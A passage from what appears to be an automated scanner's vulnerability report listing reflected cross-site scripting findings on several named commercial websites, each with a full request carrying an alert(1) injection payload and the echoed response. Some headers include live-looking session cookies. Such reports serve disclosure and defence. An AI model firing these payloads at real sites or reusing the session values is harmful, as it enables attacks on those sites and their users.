Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:4470455573253905340; KRTBCOOKIE_133=1873-6pgp44i37uxw; KRTBCOOKIE_27=1216-uid:4d5b2371-3928-7a83-24fb-d52328f5624b; KRTBCOOKIE_53=424-20108b4d-f8d0-4008-b157-1529097b61ab; KRTBCOOKIE_97=3385-uid:3c8eb88b-c9c1-47d0-9235-2d5e32a3350f; KADUSERCOOKIE=43A8ABFA-7497-471A-9AF6-2974D17EF335; KRTBCOOKIE_80=1336-002d9af2-d1e0-46f3-a4d5-a4e3b437adec.11265.18531.24197.6790.30337.8.6551.39832.10011.10012.4387.39857.7472.1073.51806.24680.39233.13893.13896.1097.13899.13902.38627.15694.15579.9691.51808.3427.18407.17256.24809.39536.39793.39794.11262.51069.1150.9855.; KRTBCOOKIE_22=488-pcv:1|uid:8392341830659049202; KRTBCOOKIE_58=1344-KH-00000000549735899; KRTBCOOKIE_32=1386-WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL; KRTBCOOKIE_148=1699-uid:439524AE836A5E4D157CECA302E891CB; KRTBCOOKIE_204=3579-06bdea66-433e-11e0-b98e-00259009a9e4; PUBRETARGET=78_1392641239.461_1392901736.403_1393381248.401_1393381248.1039_1301416785.1340_1393698747.362_1301682747.1469_1393892161.70_1301922274.1928_1302874361.375_1302874358.1376_1302874361.445_1308400481.806_1331731734.1811_1395276815.1647_1302396826.540_1395425654.1985_1304870735

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:27 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 565

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
height="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.114078968763351449f79c'-alert(1)-'99a5d4b72c7&pageURL=http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html">
...[SNIP]...

5.45. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into an HTML comment. The payload 80609--><script>alert(1)</script>1ecec661735 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /shavlik/index.cfm?m=1009&pg=697&h=80609--><script>alert(1)</script>1ecec661735&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 80609--><script>alert(1)</script>1ecec661735|697 -- -->
...[SNIP]...

5.46. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 8770d<script>alert(1)</script>23979558cba was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shavlik/index.cfm?m=1009&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f90628770d<script>alert(1)</script>23979558cba&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
</script>e58fc9f90628770d<script>alert(1)</script>23979558cba|697 -- -->
...[SNIP]...

5.47. http://my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ef24</script><script>alert(1)</script>8b8d97eb0ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:50:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 39857
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
ecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001&4ef24</script><script>alert(1)</script>8b8d97eb0ba=1';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkcheck
...[SNIP]...

5.48. http://my-happyfeet.com/cart.asp [rp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my-happyfeet.com
Path:   /cart.asp

Issue detail

The value of the rp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdeac</script><script>alert(1)</script>ad279ee61f3 was submitted in the rp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3 HTTP/1.1
Host: my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCBSRAQS=BFNNGHKCKNEHDGGGFJEAPLDH

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:49:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 39841
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
hecked);
}
function doupdate(){
   document.forms.checkoutform.mode.value='update';
   document.forms.checkoutform.action='cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001fdeac</script><script>alert(1)</script>ad279ee61f3';
   document.forms.checkoutform.onsubmit='';
   document.forms.checkoutform.submit();
}
var savemenuaction='saveitem';
function dosaveitem(lid){
   if(savemenuaction=='saveitem'){
       if(!checkchecked
...[SNIP]...

5.49. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 4c995%0aalert(1)//39aa684e7cf was submitted in the url parameter. This input was echoed as 4c995
alert(1)//39aa684e7cf
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml4c995%0aalert(1)//39aa684e7cf&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1300632449.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.2120303763.1300632449.1300817215.1301068080.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sat, 26 Mar 2011 11:52:00 GMT
Expires: Sat, 26 Mar 2011 11:52:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 116
Server: GSE

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml4c995
alert(1)//39aa684e7cf
. HTTP error 400

5.50. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c655e<script>alert(1)</script>3c3794184e6 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /10032/5d8526ab7c4243a9a90f4ea3af7d7ab9?callback=BF_PARTNER.gate_responsec655e<script>alert(1)</script>3c3794184e6&cb=931 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 70
Cache-Control: max-age=3600
Expires: Sat, 26 Mar 2011 21:36:24 GMT
Date: Sat, 26 Mar 2011 20:36:24 GMT
Connection: close

BF_PARTNER.gate_responsec655e<script>alert(1)</script>3c3794184e6(0);

5.51. https://secure.avangate.com/order/cart.php [CART_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4dd"><script>alert(1)</script>3aab9aad0e510441a was submitted in the CART_ID parameter. This input was echoed as ad4dd\"><script>alert(1)</script>3aab9aad0e510441a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd"><script>alert(1)</script>3aab9aad0e510441a&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:14:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03ad4dd\"><script>alert(1)</script>3aab9aad0e510441a" target="_blank">
...[SNIP]...

5.52. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1796"><script>alert(1)</script>4ed955d9ca569fbd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1796\"><script>alert(1)</script>4ed955d9ca569fbd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /order/cart.php?CART_ID=28d9066c6ec8a32ef621f59af80/b1796"><script>alert(1)</script>4ed955d9ca569fbd452e03&qty0=1&prod0=1523013&submit_type=cross_selling&Update=true&Checkout=true&Update=true HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
Origin: https://secure.avangate.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response (redirected)

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:14:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af80/b1796\"><script>alert(1)</script>4ed955d9ca569fbd452e03" target="_blank">
...[SNIP]...

5.53. https://secure.avangate.com/order/checkout.php [CART_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The value of the CART_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e831e"><script>alert(1)</script>4dbe77a7b98 was submitted in the CART_ID parameter. This input was echoed as e831e\"><script>alert(1)</script>4dbe77a7b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e"><script>alert(1)</script>4dbe77a7b98 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e\"><script>alert(1)</script>4dbe77a7b98" target="_blank">
...[SNIP]...

5.54. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5c0"><script>alert(1)</script>476da428095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c5c0\"><script>alert(1)</script>476da428095 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af805/3c5c0"><script>alert(1)</script>476da4280952e03 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af805/3c5c0\"><script>alert(1)</script>476da4280952e03" target="_blank">
...[SNIP]...

5.55. https://secure.shareit.com/shareit/checkout.html [prno parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Issue detail

The value of the prno request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f was submitted in the prno parameter. This input was echoed as e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f&DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_COUNTRY_ID=400&VATID=&PHONE=&FAX=&EMAIL=&EMAIL_CONFIRM=&PAYMENTTYPE_ID=&CURRENCY_ID=USD&BUTTON_NEXT.x=11&BUTTON_NEXT.y=5&BUTTON_NEXT=Next&progress=ADDITIONAL&FROM_PERSONAL=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:14:50 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 70594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
<form action="checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f" method="post" name="personal">
...[SNIP]...

5.56. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload 15362<script>alert(1)</script>c2ae901adec was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

